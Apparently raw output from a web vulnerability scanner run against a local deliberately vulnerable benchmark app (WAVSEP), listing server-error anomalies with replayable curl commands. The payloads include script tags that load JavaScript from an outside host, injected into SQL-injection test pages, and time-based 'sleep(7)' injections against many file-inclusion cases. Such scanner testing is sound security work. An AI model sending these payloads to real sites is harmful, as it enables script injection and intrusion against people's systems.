curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case18-InjectionInCalc-NumericWithoutQuotes-BooleanExploit-WithErrors.jsp" -e "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case18-InjectionInCalc-NumericWithoutQuotes-BooleanExploit-WithErrors.jsp" -d "minBalanace=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwuyvjckekfz.js%3E%3C%2Fscript%3E"

Anomaly found in /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case19-InjectionInUpdate-NumericWithoutQuotes-CommandInjection-WithErrors.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter msgid
POST /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case19-InjectionInUpdate-NumericWithoutQuotes-CommandInjection-WithErrors.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case19-InjectionInUpdate-NumericWithoutQuotes-CommandInjection-WithErrors.jsp
Content-Type: application/x-www-form-urlencoded

msgid=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw1qfycrkswz.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case19-InjectionInUpdate-NumericWithoutQuotes-CommandInjection-WithErrors.jsp" -e "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case19-InjectionInUpdate-NumericWithoutQuotes-CommandInjection-WithErrors.jsp" -d "msgid=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw1qfycrkswz.js%3E%3C%2Fscript%3E"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case01-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-AnyPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case01-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=sleep%287%29%231 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case01-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=sleep%287%29%231"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case02-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-AnyPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case02-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-AnyPathReq-Read.jsp?target=sleep%287%29%231 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case02-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-AnyPathReq-Read.jsp?target=sleep%287%29%231"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case03-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultRelativeInput-AnyPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case03-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultRelativeInput-AnyPathReq-Read.jsp?target=sleep%287%29%231 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case03-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultRelativeInput-AnyPathReq-Read.jsp?target=sleep%287%29%231"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case05-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-AnyPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case05-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-AnyPathReq-Read.jsp?target=sleep%287%29%231 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case05-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-AnyPathReq-Read.jsp?target=sleep%287%29%231"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case06-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-AnyPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case06-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-AnyPathReq-Read.jsp?target=sleep%287%29%231 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case06-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-AnyPathReq-Read.jsp?target=sleep%287%29%231"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case07-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-AnyPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case07-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-AnyPathReq-Read.jsp?target=sleep%287%29%231 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case07-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-AnyPathReq-Read.jsp?target=sleep%287%29%231"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case08-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-AnyPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case08-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-AnyPathReq-Read.jsp?target=sleep%287%29%231 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case08-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-AnyPathReq-Read.jsp?target=sleep%287%29%231"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case09-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case09-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=sleep%287%29%231 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case09-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=sleep%287%29%231"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case10-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-NoPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case10-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-NoPathReq-Read.jsp?target=sleep%287%29%231 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case10-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-NoPathReq-Read.jsp?target=sleep%287%29%231"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case11-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case11-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp?target=sleep%287%29%231 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case11-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp?target=sleep%287%29%231"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case12-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-NoPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case12-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-NoPathReq-Read.jsp?target=sleep%287%29%231 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case12-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-NoPathReq-Read.jsp?target=sleep%287%29%231"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=sleep%287%29%231 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=sleep%287%29%231"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=sleep%287%29%231 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=sleep%287%29%231"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=sleep%287%29%231 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=sleep%287%29%231"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=sleep%287%29%231 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=sleep%287%29%231"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=sleep%287%29%231 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=sleep%287%29%231"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=sleep%287%29%231 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=sleep%287%29%231"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=sleep%287%29%231 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=sleep%287%29%231"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case23-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case23-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp?target=sleep%287%29%231 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case23-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp?target=sleep%287%29%231"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case25-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultFullInput-AnyPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case25-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=sleep%287%29%231 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case25-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=sleep%287%29%231"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case26-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-AnyPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case26-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-AnyPathReq-Read.jsp?target=sleep%287%29%231 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case26-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-AnyPathReq-Read.jsp?target=sleep%287%29%231"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case27-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-AnyPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case27-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-AnyPathReq-Read.jsp?target=sleep%287%29%231 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case27-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-AnyPathReq-Read.jsp?target=sleep%287%29%231"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case28-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case28-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=sleep%287%29%231 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case28-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=sleep%287%29%231"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case29-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case29-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp?target=sleep%287%29%231 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case29-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp?target=sleep%287%29%231"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case30-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-NoPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case30-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-NoPathReq-Read.jsp?target=sleep%287%29%231 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case30-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-NoPathReq-Read.jsp?target=sleep%287%29%231"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case31-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case31-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=sleep%287%29%231 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case31-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=sleep%287%29%231"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case32-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case32-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=sleep%287%29%231 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case32-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=sleep%287%29%231"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case33-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case33-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=sleep%287%29%231 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case33-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=sleep%287%29%231"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=sleep%287%29%231 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=sleep%287%29%231"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case38-LFI-FileClass-FilenameContext-BackslashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case38-LFI-FileClass-FilenameContext-BackslashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=sleep%287%29%231 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case38-LFI-FileClass-FilenameContext-BackslashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=sleep%287%29%231"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=sleep%287%29%231 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=sleep%287%29%231"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=sleep%287%29%231 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=sleep%287%29%231"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=sleep%287%29%231 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=sleep%287%29%231"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case45-LFI-ContextStream-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case45-LFI-ContextStream-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=sleep%287%29%231 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case45-LFI-ContextStream-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=sleep%287%29%231"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case46-LFI-ContextStream-FilenameContext-BackslashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case46-LFI-ContextStream-FilenameContext-BackslashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=sleep%287%29%231 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case46-LFI-ContextStream-FilenameContext-BackslashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=sleep%287%29%231"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case47-LFI-ContextStream-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case47-LFI-ContextStream-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=sleep%287%29%231 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case47-LFI-ContextStream-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=sleep%287%29%231"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case50-LFI-ContextStream-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case50-LFI-ContextStream-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=sleep%287%29%231 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case50-LFI-ContextStream-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=sleep%287%29%231"

